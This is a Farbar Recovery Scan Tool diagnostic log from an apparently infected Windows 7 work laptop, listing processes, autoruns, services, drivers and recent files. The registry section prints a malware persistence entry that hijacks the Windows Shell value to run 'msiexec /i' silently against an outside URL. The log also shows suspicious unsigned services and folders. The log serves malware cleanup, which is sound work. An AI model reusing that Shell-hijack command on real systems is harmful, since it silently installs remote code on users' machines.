Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 08-05-2017
Ran by fundowic (administrator) on HU1W7L-107315 (13-05-2017 09:59:26)
Running from E:\
Loaded Profiles: fundowic (Available Profiles: fundowic)
Platform: Windows 7 Enterprise Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFSrvWsc.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Pulse Secure, LLC) C:\Program Files (x86)\Common Files\Pulse Secure\JUNS\PulseSecureService.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\HidMonitorSvc.exe
(McAfee, Inc.) C:\Program Files\McAfee\Agent\macmnsvc.exe
(McAfee, Inc.) C:\Program Files\McAfee\Agent\masvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft\MDOP MBAM\MBAMAgent.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe
(Pulse Secure, LLC) C:\Program Files (x86)\Common Files\Pulse Secure\JUNS\PulseSecureService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(MKS Software Inc.) C:\Windows\System32\nutsrv4.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\pg_ctl.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(PostgreSQL Global Development Group) C:\Program Files\PostgreSQL\9.4\bin\postgres.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\McAfee\Agent\x86\macompatsvc.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE
() C:\Program Files (x86)\Common Files\Pulse Secure\JamUI\Pulse.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(McAfee, Inc.) C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe
(McAfee, Inc.) C:\Program Files\McAfee\Agent\x86\mctray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe
(IObit) C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFTips.exe
(BayHubTech/O2Micro International) C:\Windows\System32\drivers\o2flash.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [727896 2014-12-22] (Alps Electric Co., Ltd.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-12-22] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_MAXX6] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1396592 2014-12-22] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472984 2013-12-10] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [PulseSecure] => C:\Program Files (x86)\Common Files\Pulse Secure\JamUI\Pulse.exe [3209176 2016-11-30] ()
HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [244080 2015-08-20] (McAfee, Inc.)
HKLM-x32\...\Run: [NuTCSetupEnviron] => C:\Program Files (x86)\MKS Toolkit\bin\ncoeenv.exe [37160 2008-10-30] (MKS Software Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files\McAfee\Agent\x86\UpdaterUI.exe [516432 2017-01-05] (McAfee, Inc.)
HKLM-x32\...\Run: [IObit Malware Fighter] => C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe [5296416 2017-04-11] (IObit)
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Run: [Lync] => C:\Program Files (x86)\Microsoft Office\Office15\lync.exe [24146632 2016-09-13] (Microsoft Corporation)
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRkMdRYFdRkUcN8Y1N8U2F8F5NTLQMUI4NkVSRWk2Nq== /q
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\...\MountPoints2: {d89af5d9-3797-11e6-b29d-185e0faf7b8d} - E:\AutoRun.exe
Startup: C:\Users\fundowic\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk [2016-05-19]
ShortcutTarget: OneNote 2010 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office14\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 192.168.1.1
Tcpip\..\Interfaces\{1DF9DAF4-EA53-4A79-B366-CA85A6D77631}: [DhcpNameServer] 192.168.1.1 192.168.1.1
Tcpip\..\Interfaces\{6CA3778C-8DAF-4D68-BF68-B888A309FE93}: [NameServer] 10.1.2.50,10.98.64.41
Tcpip\..\Interfaces\{8BD0C3FB-99DC-4EA2-B071-2109AF3C05F3}: [NameServer] 10.1.2.50,10.98.64.41

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-202387345-4201324245-3709672714-20981\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2017-03-28] (IObit)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2016-09-13] (Microsoft Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20160309165456.dll [2016-03-09] (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-21] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2016-08-16] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-09-13] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-24] (Oracle Corporation)
BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20160309165457.dll [2016-03-09] (McAfee, Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-24] (Oracle Corporation)
DPF: HKLM {583C990C-2D38-410c-9A4A-0932D66A754F} hxxps://pulsesecure.net/dana-cached/sc/PulseSetupClient64.cab
DPF: HKLM-x32 {8E375A63-C616-46F1-AC77-59DF78F3A826} hxxps://pulsesecure.net/dana-cached/sc/PulseSetupClient.cab

FireFox:
========
FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore
FF Extension: (McAfee ScriptScan for Firefox) - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2017-04-27] [not signed]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw.dll [2014-11-07] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-24] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-24] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-09-13] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-09-13] (Microsoft Corporation)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ApHidMonitorService; C:\Program Files\DellTPad\HidMonitorSvc.exe [87384 2014-12-22] (Alps Electric Co., Ltd.)
S2 CcmExec; C:\WINDOWS\CCM\CcmExec.exe [1785528 2016-06-20] (Microsoft Corporation)
S4 CmRcService; C:\WINDOWS\CCM\RemCtrl\CmRcService.exe [698552 2016-06-20] (Microsoft Corporation)
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [328296 2014-12-22] (Intel Corporation)
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [1764640 2017-04-11] (IObit)
S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2017-03-28] (IObit)
S3 lpasvc; C:\Program Files\Microsoft Policy Platform\policyHost.exe [50352 2016-05-31] (Microsoft Corporation)
S3 lppsvc; C:\Program Files\Microsoft Policy Platform\policyHost.exe [50352 2016-05-31] (Microsoft Corporation)
R2 macmnsvc; C:\Program Files\McAfee\Agent\macmnsvc.exe [141136 2017-01-05] (McAfee, Inc.)
R2 masvc; C:\Program Files\McAfee\Agent\masvc.exe [56656 2017-01-05] (McAfee, Inc.)
R2 MBAMAgent; C:\Program Files\Microsoft\MDOP MBAM\MBAMAgent.exe [323304 2014-03-04] (Microsoft Corporation)
R3 McAfeeFramework; C:\Program Files\McAfee\Agent\x86\macompatsvc.exe [213840 2017-01-05] (McAfee, Inc.)
R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [262544 2016-03-09] (McAfee, Inc.)
R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\VsTskMgr.exe [215104 2015-10-29] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [384528 2017-04-21] (McAfee, Inc.)
R3 mfevtp; C:\WINDOWS\system32\mfevtps.exe [316432 2016-11-18] (McAfee, Inc.)
R2 NuTCRACKERService; C:\WINDOWS\system32\nutsrv4.exe [442592 2008-10-30] (MKS Software Inc.)
R2 O2FLASH; C:\WINDOWS\system32\DRIVERS\o2flash.exe [65536 2014-12-22] (BayHubTech/O2Micro International)
R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [File not signed]
R2 postgresql-x64-9.4; C:\Program Files\PostgreSQL\9.4\bin\pg_ctl.exe [92160 2015-12-07] (PostgreSQL Global Development Group) [File not signed]
R2 PulseSecureService; C:\Program Files (x86)\Common Files\Pulse Secure\JUNS\PulseSecureService.exe [182232 2016-11-30] (Pulse Secure, LLC)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [291032 2014-12-22] (Realtek Semiconductor)
S3 smstsmgr; C:\WINDOWS\CCM\TSManager.exe [324792 2016-06-20] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-03-10] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [36096 2014-12-16] (Advanced Micro Devices, Inc.)
R3 BCMNFCSCR; C:\WINDOWS\System32\DRIVERS\bcmnfcscr7.sys [41728 2014-12-22] (Broadcom Corporation.)
R3 bcmnfcusb; C:\WINDOWS\System32\DRIVERS\bcmnfcusb7.sys [44288 2014-12-22] (Broadcom Corporation.)
R3 dptf_acpi; C:\WINDOWS\System32\DRIVERS\dptf_acpi.sys [41824 2014-12-22] (Intel Corporation)
R3 dptf_cpu; C:\WINDOWS\System32\DRIVERS\dptf_cpu.sys [35136 2014-12-22] (Intel Corporation)
S3 dsNcAdpt; C:\WINDOWS\System32\DRIVERS\dsNcAdpt.sys [36816 2015-08-05] (Juniper Networks) [File not signed]
R3 e1dexpress; C:\WINDOWS\System32\DRIVERS\e1d62x64.sys [489752 2014-12-22] (Intel Corporation)
R0 iaStorF; C:\WINDOWS\System32\drivers\iaStorF.sys [28008 2014-12-22] (Intel Corporation)
R1 IMFCameraProtect; C:\WINDOWS\system32\drivers\IMFCameraProtect.sys [26272 2017-03-29] (IObit.com)
R3 IMFDownProtect; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFDownProtect.sys [21360 2017-03-08] (IObit.com)
R3 IMFFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\IMFFilter.sys [22440 2016-12-22] (IObit)
R3 IMFForceDelete; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\IMFForceDelete.sys [16216 2017-03-29] (IObit.com)
R3 IntcAzAudAddService; C:\WINDOWS\System32\drivers\RTDVHD64.sys [2642264 2014-12-22] (Realtek Semiconductor Corp.)
S3 ISCT; C:\WINDOWS\system32\drivers\ISCTD.sys [44744 2014-12-22] ()
R1 jnprns; C:\WINDOWS\System32\DRIVERS\jnprns.sys [507192 2015-12-17] (Juniper Networks)
S4 jnprTdi_824_597; C:\WINDOWS\system32\Drivers\jnprTdi_824_597.sys [106176 2016-06-01] (Pulse Secure, LLC)
S3 jnprva; C:\WINDOWS\System32\DRIVERS\jnprva.sys [30072 2015-12-17] (Juniper Networks, Inc.)
R3 JnprVaMgr; C:\WINDOWS\System32\DRIVERS\jnprvamgr.sys [45352 2015-12-17] (Juniper Networks, Inc.)
S3 lehidmini; C:\WINDOWS\system32\drivers\leath_hid.sys [39704 2014-12-22] (Atheros)
R3 MEIx64; C:\WINDOWS\System32\DRIVERS\TeeDriverx64.sys [129312 2014-12-22] (Intel Corporation)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [479288 2016-11-18] (McAfee, Inc.)
R3 mfeaacsk; C:\WINDOWS\System32\drivers\mfeaacsk.sys [64416 2016-03-09] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [364600 2016-11-18] (McAfee, Inc.)
U3 mfeavfk01; no ImagePath
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [496888 2016-03-09] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [877624 2016-11-18] (McAfee, Inc.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110136 2016-11-18] (McAfee, Inc.)
S3 mferkdet; C:\WINDOWS\System32\drivers\mferkdet.sys [114880 2016-03-09] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [344704 2016-03-09] (McAfee, Inc.)
R3 NETwNs64; C:\WINDOWS\System32\DRIVERS\Netwsw02.sys [3429144 2014-12-22] (Intel Corporation)
R3 O2FJ2RDR; C:\WINDOWS\System32\DRIVERS\O2FJ2w7x64.sys [210592 2014-12-22] (BayHubTech/O2Micro )
S3 prepdrvr; C:\WINDOWS\System32\DRIVERS\prepdrv.sys [26984 2013-09-11] (Microsoft Corporation)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [34752 2016-11-03] (IObit.com)
S3 ST7007; C:\WINDOWS\system32\drivers\ST7007.sys [69896 2014-12-22] (STMicroelectronics)
R3 ST_Accel; C:\WINDOWS\System32\DRIVERS\ST_Accel.sys [75952 2014-12-22] (STMicroelectronics)
S3 swg3knmea05; C:\WINDOWS\system32\drivers\swg3knmea05.sys [275216 2014-12-22] (Sierra Wireless Incorporated)
S3 swg3kser05; C:\WINDOWS\system32\drivers\swg3kser05.sys [275216 2014-12-22] (Sierra Wireless Incorporated)
S3 swibus05; C:\WINDOWS\system32\drivers\swibus05.sys [88848 2014-12-22] (Sierra Wireless Inc.)
S3 swibusflt05; C:\WINDOWS\system32\drivers\swibusflt05.sys [88848 2014-12-22] (Sierra Wireless Inc.)
R3 wbfcvusbdrv; C:\WINDOWS\System32\Drivers\wbfcvusbdrv.sys [17632 2014-12-22] ()
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-13 09:59 - 2017-05-13 09:59 - 00000000 ____D C:\FRST
2017-05-12 23:02 - 2017-05-12 23:09 - 00000000 ____D C:\ProgramData\ProductData
2017-05-12 22:55 - 2017-05-12 22:55 - 00004753 _____ C:\Users\fundowic\Desktop\JRT.txt
2017-05-12 22:49 - 2017-05-13 09:54 - 00000066 _____ C:\Users\Public\Documents\temp.dat
2017-05-12 22:42 - 2017-05-12 23:01 - 00000000 ____D C:\AdwCleaner
2017-05-12 22:32 - 2017-05-12 23:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller
2017-05-12 22:32 - 2017-05-12 22:32 - 00001377 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller.lnk
2017-05-12 22:32 - 2017-05-12 22:32 - 00001365 _____ C:\Users\Public\Desktop\IObit Uninstaller.lnk
2017-05-12 22:18 - 2017-05-12 22:18 - 00121142 _____ C:\WINDOWS\ntbtlog.txt
2017-05-12 20:03 - 2017-05-12 23:01 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\IObit
2017-05-12 20:03 - 2017-05-12 23:01 - 00000000 ____D C:\Users\fundowic\AppData\LocalLow\IObit
2017-05-12 20:03 - 2017-05-12 23:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2017-05-12 20:03 - 2017-05-12 20:03 - 00001184 _____ C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2017-05-12 20:03 - 2017-03-29 18:05 - 00026272 _____ (IObit.com) C:\WINDOWS\system32\Drivers\IMFCameraProtect.sys
2017-05-12 20:02 - 2017-05-12 23:01 - 00000000 ____D C:\ProgramData\IObit
2017-05-12 20:02 - 2017-05-12 22:32 - 00000000 ____D C:\Program Files (x86)\IObit
2017-05-12 20:02 - 2017-05-12 20:02 - 00000000 ____D C:\ProgramData\{BE2ACE5C-32B7-4777-9BDF-ECF87CDAB705}
2017-05-11 13:18 - 2017-05-12 22:45 - 00000000 ____D C:\WINDOWS\system32\log
2017-05-11 13:18 - 2017-05-12 19:47 - 00000000 ____D C:\Users\fundowic\AppData\LocalLow\Mozilla
2017-05-11 13:18 - 2017-05-11 13:18 - 00002099 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-05-11 13:18 - 2017-05-11 13:18 - 00001941 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\Mozilla
2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\Users\fundowic\AppData\Local\Bagsarah
2017-05-11 13:18 - 2017-05-11 13:18 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 ____D C:\Program Files (x86)\Bagsarah
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\33
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\1111
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\11
2017-05-11 13:17 - 2017-05-11 13:17 - 00000000 _____ C:\WINDOWS\SysWOW64\00
2017-05-11 13:12 - 2017-05-11 13:16 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-05-10 10:08 - 2017-05-10 10:08 - 00165431 _____ C:\Users\fundowic\Desktop\wojska_specjalne_wp.pdf
2017-04-28 20:44 - 2017-05-09 13:11 - 00000000 ____D C:\Users\fundowic\Desktop\DoWywolania
2017-04-22 17:17 - 2017-04-22 17:17 - 00000000 ____D C:\Program Files\Common Files\Intel
2017-04-19 21:23 - 2017-04-19 21:23 - 00000000 ____D C:\Users\fundowic\AppData\Local\CEF
2017-04-18 14:28 - 2017-04-18 14:28 - 00000000 ____D C:\Users\Default\AppData\Local\Adobe
2017-04-18 14:28 - 2017-04-18 14:28 - 00000000 ____D C:\Users\Default User\AppData\Local\Adobe
2017-04-15 16:19 - 2017-04-15 16:19 - 00000000 ____D C:\Users\fundowic\AppData\Roaming\SSMgre

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)
2017-05-13 09:54 - 2015-03-04 11:33 - 00000000 ____D C:\WINDOWS\ccmsetup
2017-05-12 23:17 - 2016-04-13 10:49 - 00000000 ____D C:\Users\fundowic\AppData\Local\CrashDumps
2017-05-12 23:14 - 2009-07-14 06:45 - 00019104 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-12 23:14 - 2009-07-14 06:45 - 00019104 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-12 23:05 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-05-12 23:02 - 2009-07-14 07:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-12 23:01 - 2016-03-11 10:00 - 00000000 ____D C:\Users\fundowic
2017-05-12 23:01 - 2016-03-09 16:38 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 23:01 - 2016-03-09 16:38 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-12 23:01 - 2015-03-04 11:36 - 00000000 ____D C:\WINDOWS\CCM
2017-05-12 23:01 - 2011-04-12 09:45 - 00000000 ___RD C:\Users\Public\Recorded TV
2017-05-12 23:01 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\registration
2017-05-12 23:01 - 2009-07-14 05:20 - 00000000 ____D C:\WINDOWS\inf
2017-05-12 22:45 - 2016-12-09 21:40 - 00000000 ____D C:\Quarantine
2017-05-12 20:49 - 2016-03-11 21:39 - 00000000 ____D C:\Program Files (x86)\Google
2017-05-12 19:51 - 2016-03-14 10:32 - 00000000 ____D C:\Users\fundowic\AppData\Local\ElevatedDiagnostics
2017-05-12 19:23 - 2016-03-11 21:40 - 00000000 ____D C:\Users\fundowic\AppData\Local\Google
2017-05-12 19:21 - 2016-03-09 17:51 - 00000000 ____D C:\Program Files (x86)\McAfee
2017-05-12 19:20 - 2016-03-09 17:47 - 00000000 ____D C:\Program Files\Common Files\McAfee
2017-05-12 19:19 - 2016-03-09 17:47 - 00000000 ____D C:\ProgramData\McAfee
2017-05-12 12:39 - 2016-03-11 10:02 - 00003918 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F98ED762-D443-493A-AC3A-6E5B73F1BFAA}
2017-05-11 13:18 - 2016-03-11 21:40 - 00002276 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-05-09 12:56 - 2016-05-18 16:19 - 00000000 ____D C:\Users\fundowic\Desktop\national
2017-05-08 05:35 - 2009-07-14 07:13 - 00787902 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-04-29 14:55 - 2016-11-07 12:01 - 00000000 ____D C:\Zdjęcia
2017-04-28 20:48 - 2017-01-06 12:02 - 00000000 ____D C:\Filmy
2017-04-28 20:47 - 2015-03-04 11:33 - 00000638 _____ C:\WINDOWS\SMSCFG.INI
